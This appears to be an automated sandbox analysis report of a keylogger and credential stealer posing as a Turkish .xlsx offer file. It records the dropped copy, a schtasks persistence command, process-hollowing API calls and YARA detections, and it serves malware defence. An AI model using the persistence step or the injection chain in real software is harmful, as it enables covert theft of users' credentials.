MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:52:19
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:52:20
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Imagebase:	0x970000
File size:	686'592 bytes
MD5 hash:	2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	08:52:21
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
Imagebase:	0x800000
File size:	686'592 bytes
MD5 hash:	2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:52:22
Start date:	07/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:52:24
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"
Imagebase:	0xce0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:52:24
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:52:24
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
Imagebase:	0xab0000
File size:	686'592 bytes
MD5 hash:	2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.6%
Total number of Nodes:	229
Total number of Limit Nodes:	9

Executed Functions

Function 07DCA490 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10a4ec83addee29682521effdaa925960975c88129dc14a65c15e0383dc9b75
Instruction ID: 767b81bf6f32efc75443f21a8238bbbd1defecea52336b8d2f2cc7d54e4ebc75
Opcode Fuzzy Hash: c10a4ec83addee29682521effdaa925960975c88129dc14a65c15e0383dc9b75
Instruction Fuzzy Hash: 94C1A9B570070A9FDB29DB75C460BAAF7FAAFCA700F14846DD1468B690DB35E802CB51

Function 07DC8ED0 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c57f5ddd890efa55fd185972458acf17837bf6f12ee60901ef7af5304bed8de9
Instruction ID: 5311b6d7aba66daf1e25f5874baf269f4bb8ebb27a6147ca79b302d13bc9a7df
Opcode Fuzzy Hash: c57f5ddd890efa55fd185972458acf17837bf6f12ee60901ef7af5304bed8de9
Instruction Fuzzy Hash: 44911DB1D1522ACFDB24CF66C8407E9F7B5BF8A300F1091EAD549A7240DB749A85CF50

Function 07DC6980 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cba531a16d60f980ea93f3c6f0c7d5e482b711700c2299a4e34ffbeb252dac1
Instruction ID: 7b9c2bf9d588bbf870571011ba9cbcb4c75b7c8af35e6300b22d06f15ad81f31
Opcode Fuzzy Hash: 1cba531a16d60f980ea93f3c6f0c7d5e482b711700c2299a4e34ffbeb252dac1
Instruction Fuzzy Hash: 7F41D3B4D19209DBDB04CFAAD5443EDFBFAAB8A300F14E469D049A3251DB34D945CF15

Function 07DC0040 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d2be07f38dc84a10440131068a4a958a5117e2a1976ec80bae86e448ffa7f2f
Instruction ID: 8db325a93188f05080121e181e4c0258beb34cb7b03d7df394ed93b5176869cb
Opcode Fuzzy Hash: 4d2be07f38dc84a10440131068a4a958a5117e2a1976ec80bae86e448ffa7f2f
Instruction Fuzzy Hash: 8C4102B0D09219CBDB18CFA6C9447EEFBBABF8A301F10D069D419AB254DB349985CF50

Function 07DC0007 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81169d56bcb870ea126440730185fb6e86d3bfa138fc59cba05db9d6ec9ee1eb
Instruction ID: 4a41da246b537e63cfaa855231a24f09b90864d3c70e6396aaddefa6e2a2cf92
Opcode Fuzzy Hash: 81169d56bcb870ea126440730185fb6e86d3bfa138fc59cba05db9d6ec9ee1eb
Instruction Fuzzy Hash: 304105B0D09259CFDB09CFA6C8553EEBBF6AF8A301F14C06AD049AB255DB380945CF50

Function 07DC5C24 Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DC5E66

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a2f288569f8d6ae3523ab07618621e7b9f07e8dc26bad5d56c6f8e5c0503d8e7
Instruction ID: 86850ca1aeb7e1f6c27b5ed7d53be88aed8289469ed7469b15c27c82ee30df3a
Opcode Fuzzy Hash: a2f288569f8d6ae3523ab07618621e7b9f07e8dc26bad5d56c6f8e5c0503d8e7
Instruction Fuzzy Hash: F5A15AB1D0031ADFEB14CF68D840BDDFBB2AB48310F248169E819A7244DB749991CF91

Function 07DC5C30 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DC5E66

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f5c1bb1050ecaf77ac157f17be1157d453cc4df26867eeae1d31b43a5e1a1c0e
Instruction ID: 4c6b7c068d5422de51792e3cbc57c638097e2de8013f5af7d3b699ca0a37358c
Opcode Fuzzy Hash: f5c1bb1050ecaf77ac157f17be1157d453cc4df26867eeae1d31b43a5e1a1c0e
Instruction Fuzzy Hash: D9914CB1D0031ADFEB24CF68D840BEDFBB6BB48314F148169E819A7244DB749995CF91

Function 031DAD48 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031DAF9E

Memory Dump Source

Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 49c7316e00954877ad042a160b11ec5e4e9afcce499f746816cf60cf9821049e
Instruction ID: 61d0c9b4e47f69aa1aa82760577b7d2efcf1e6ac43ca130fe6a98b8f42107a1b
Opcode Fuzzy Hash: 49c7316e00954877ad042a160b11ec5e4e9afcce499f746816cf60cf9821049e
Instruction Fuzzy Hash: C1712470A00B058FE724DF29D44479ABBF5FF89204F048A2DE48ADBB40DB75E849CB95

Function 031D44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031D59C9

Memory Dump Source

Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 028e88c287953b0df80cc09347aa5dd67c220d1559a9dd5832bea08cb84940bf
Instruction ID: fa4825dd0b1ac017ca22c0ed206c8e6c74d7e042e6dfa8bc1777b7ba093866f4
Opcode Fuzzy Hash: 028e88c287953b0df80cc09347aa5dd67c220d1559a9dd5832bea08cb84940bf
Instruction Fuzzy Hash: CB41C271C00729CFEB28CFA9C8847DDBBB6BF4A304F24805AD409AB251DB756945CF90

Function 031D590C Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031D59C9

Memory Dump Source

Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9f463fde7437fd2dcd774b7aede20d3789755b08f26eba334fbebc35063e3af5
Instruction ID: cb0e56bd181113a91f1533e98e3af9afdc63ea02c1bd9ac45351dd9055d1ad6c
Opcode Fuzzy Hash: 9f463fde7437fd2dcd774b7aede20d3789755b08f26eba334fbebc35063e3af5
Instruction Fuzzy Hash: 4A41D271C01729CFEB28CFA9C9857DDBBB6BF4A304F24805AD408AB251DB756946CF50

Function 07DC59A0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DC5A38

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6652e3b1f1273925ad8926863f399cdf14bfcb84b410d3fa54b7e4b61c9456f7
Instruction ID: 43669d9fbf5f086967a8dbc234e9ba3d0d517b7dd55de9f19252ead441e96e38
Opcode Fuzzy Hash: 6652e3b1f1273925ad8926863f399cdf14bfcb84b410d3fa54b7e4b61c9456f7
Instruction Fuzzy Hash: 732137B59003499FDB14CFAAC980BDEBBF5FF48314F14842AE919A7240D778A951CBA4

Function 07DC59A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DC5A38

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 95a58c83ffa043646940f1133ab768ad9f9ca52502c19ea8edadc041e6987429
Instruction ID: a987f1ebe6cc4815c03f4c638e9eb0ab371cb9d303c42619cc8e0be5de15414d
Opcode Fuzzy Hash: 95a58c83ffa043646940f1133ab768ad9f9ca52502c19ea8edadc041e6987429
Instruction Fuzzy Hash: DA2135B59003499FDB10CFAAC980BDEBBF5FB48310F14842AE919A7240C778A950CBA4

Function 07DC53D0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DC5456

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a8f11cc0afde5d2baf81136edab5e603dd9cda3a58b77da702a9d6ab426888b5
Instruction ID: 57b80c083b413bab0b463927ca440eeb5ca1415c74526b391cfdab23486e9646
Opcode Fuzzy Hash: a8f11cc0afde5d2baf81136edab5e603dd9cda3a58b77da702a9d6ab426888b5
Instruction Fuzzy Hash: 982136B1D003099FDB14CFAAC4847EEBBF4EF48210F24842ED559A7240CB78A945CFA5

Function 07DC5A90 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DC5B18

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 98e52ed0b01da6eb835148d862b07160a8e881852942bf28e23d3f8b3b7b0891
Instruction ID: c1a69a2d1c3430293467c63052bdb9414c993b8654bae0a7733132366f1aa2de
Opcode Fuzzy Hash: 98e52ed0b01da6eb835148d862b07160a8e881852942bf28e23d3f8b3b7b0891
Instruction Fuzzy Hash: F62126B6C003499FDB14DFAAD880BEEBBF5FF48310F10842AE519A7240C7399941CBA4

Function 031DD21C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031DD5F6,?,?,?,?,?), ref: 031DD6B7

Memory Dump Source

Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4ed4caf44f37fb54d25ca04a1d95af40f784727341acf2f3d05b8e410790f236
Instruction ID: 134a816b005216ea3cfa6a11fe389465e1ab77e314317a42d7f2e4cdcd799073
Opcode Fuzzy Hash: 4ed4caf44f37fb54d25ca04a1d95af40f784727341acf2f3d05b8e410790f236
Instruction Fuzzy Hash: AD21E3B5D00248EFDB10DF9AD584ADEBBF8EB48310F14841AE918A7350D778A944CFA5

Function 07DC53D8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DC5456

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 85445710c96ed79f2eb18431e73550bd72093610fe3bda22f5bd6f9499594fc6
Instruction ID: 68bcdcdce0a3e61e44e73e050fa7c8e684283cc9d44c2cd5c0d5fb38c94622a6
Opcode Fuzzy Hash: 85445710c96ed79f2eb18431e73550bd72093610fe3bda22f5bd6f9499594fc6
Instruction Fuzzy Hash: 772125B1D043098FDB14DFAAC4847AEBBF4AB48210F64842ED519A7240CB78A945CBA5

Function 07DC5A98 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DC5B18

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e268abf697d05dc41a2cfd61d39cc2cf648bc9d00ff2ec46f76a17718f115ff3
Instruction ID: 757694906aebf7d29ad73931a0944578da611ad43013eb86b538480fca683208
Opcode Fuzzy Hash: e268abf697d05dc41a2cfd61d39cc2cf648bc9d00ff2ec46f76a17718f115ff3
Instruction Fuzzy Hash: 822107B5C003499FDB14CF9AC840BEEBBF5FF48310F10842DE519A7240C779A5418BA5

Function 031DD629 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031DD5F6,?,?,?,?,?), ref: 031DD6B7

Memory Dump Source

Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a0d0e4ef31e359398db7cccf7c5d3863f0305e3e465a17774f46893a88779fdb
Instruction ID: 8e8c0329982eeb7f0b2089c3eb142976151771e97aade7809995812f19ecda14
Opcode Fuzzy Hash: a0d0e4ef31e359398db7cccf7c5d3863f0305e3e465a17774f46893a88779fdb
Instruction Fuzzy Hash: 4B21C4B5D00249DFDB10CF9AD584ADEBBF5FB48314F14841AE918A7350D378A944CFA5

Function 07DC58E0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DC5956

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b9b5758acf854add61c4434393b39bd96e0383c97296dc5cbd1c2f1acbcb1579
Instruction ID: fc69fa3a372e17d97dd48feb079cf93b7368c4f91edfd12bb929f29c4ce3f77c
Opcode Fuzzy Hash: b9b5758acf854add61c4434393b39bd96e0383c97296dc5cbd1c2f1acbcb1579
Instruction Fuzzy Hash: D42136758002499FDB14DFAAC844BDEBBF5EF48320F24841AE915A7250CB75A950CFA1

Function 07DC58E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DC5956

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d9faea4e97514cdd05fef4044c9dba40cb996de2446d378d0e671e4920396324
Instruction ID: 8d8592dec1f4244ca7cdc0e5abcbb4bf58d75918f3fea71df5f738fb7650dbc2
Opcode Fuzzy Hash: d9faea4e97514cdd05fef4044c9dba40cb996de2446d378d0e671e4920396324
Instruction Fuzzy Hash: 38112676C003499FDB24DFAAC844BDEBBF5EB48320F248419E519A7250CB75A950CFA5

Function 07DC5320 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07DC538A

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dcff21404a26eb11d8268c2272977df24a907ed9276e16a8ca155d03c82de87c
Instruction ID: 228aebceae7090f4e3c8945e2fa907d0de9efa383ee15b88f6d1c634a85d41c8
Opcode Fuzzy Hash: dcff21404a26eb11d8268c2272977df24a907ed9276e16a8ca155d03c82de87c
Instruction Fuzzy Hash: 2D1134B1D003498FDB24DFAAC44479EFBF4AF88214F20841AD559A7240CA79A9408BA5

Function 07DC5328 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07DC538A

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5415a7031114b71f01023511c900ad2b253e3b50a99ed73117a4848e8c30c1b9
Instruction ID: a69657830b80904011026796352c38c01996cc30e197e9c8639d02c8fcaceae2
Opcode Fuzzy Hash: 5415a7031114b71f01023511c900ad2b253e3b50a99ed73117a4848e8c30c1b9
Instruction Fuzzy Hash: 621125B5D003498FDB24DFAAC4447EEFBF4EB88224F24841ED519A7340CA79A940CBA5

Function 07DCA071 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07DCA0D5

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7faac856665a434c6afa47b260aa1b6143ae1f1bd21b9b6d9fcf5bf3b633e965
Instruction ID: d9b00825ef6e7edffd78dbfa0160ed028074df3ff72696e09f8e2d05293b197e
Opcode Fuzzy Hash: 7faac856665a434c6afa47b260aa1b6143ae1f1bd21b9b6d9fcf5bf3b633e965
Instruction Fuzzy Hash: DB11D2B98002499FDB10CF9AC584BDEFBF8FB48314F108419E554A7340C375A944CFA1

Function 07DC6F84 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07DCA0D5

Memory Dump Source

Source File: 00000000.00000002.1383128972.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7dc0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6477b6d9a803e0a006d1c53217afcb5ce3dbfc7239260e0359b9f17d3330ce24
Instruction ID: a6880ec9bedd46ef2688ebfae7fa6dcb2af858f85d887b2840dee406b163b6c6
Opcode Fuzzy Hash: 6477b6d9a803e0a006d1c53217afcb5ce3dbfc7239260e0359b9f17d3330ce24
Instruction Fuzzy Hash: 7411E0B58006499FEB20CF9AC484BDEFBF8EB48310F108419E958A7340C375A984CFA1

Function 031DAF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031DAF9E

Memory Dump Source

Source File: 00000000.00000002.1376971607.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 19848edfacbb49a25d23c58227f87b5da843f9bb0a2cf6b1a637583183ac864e
Instruction ID: 3bd37b5cd05a05d6900e5fd924451367cd83246b6eb8638cc235c1be21487207
Opcode Fuzzy Hash: 19848edfacbb49a25d23c58227f87b5da843f9bb0a2cf6b1a637583183ac864e
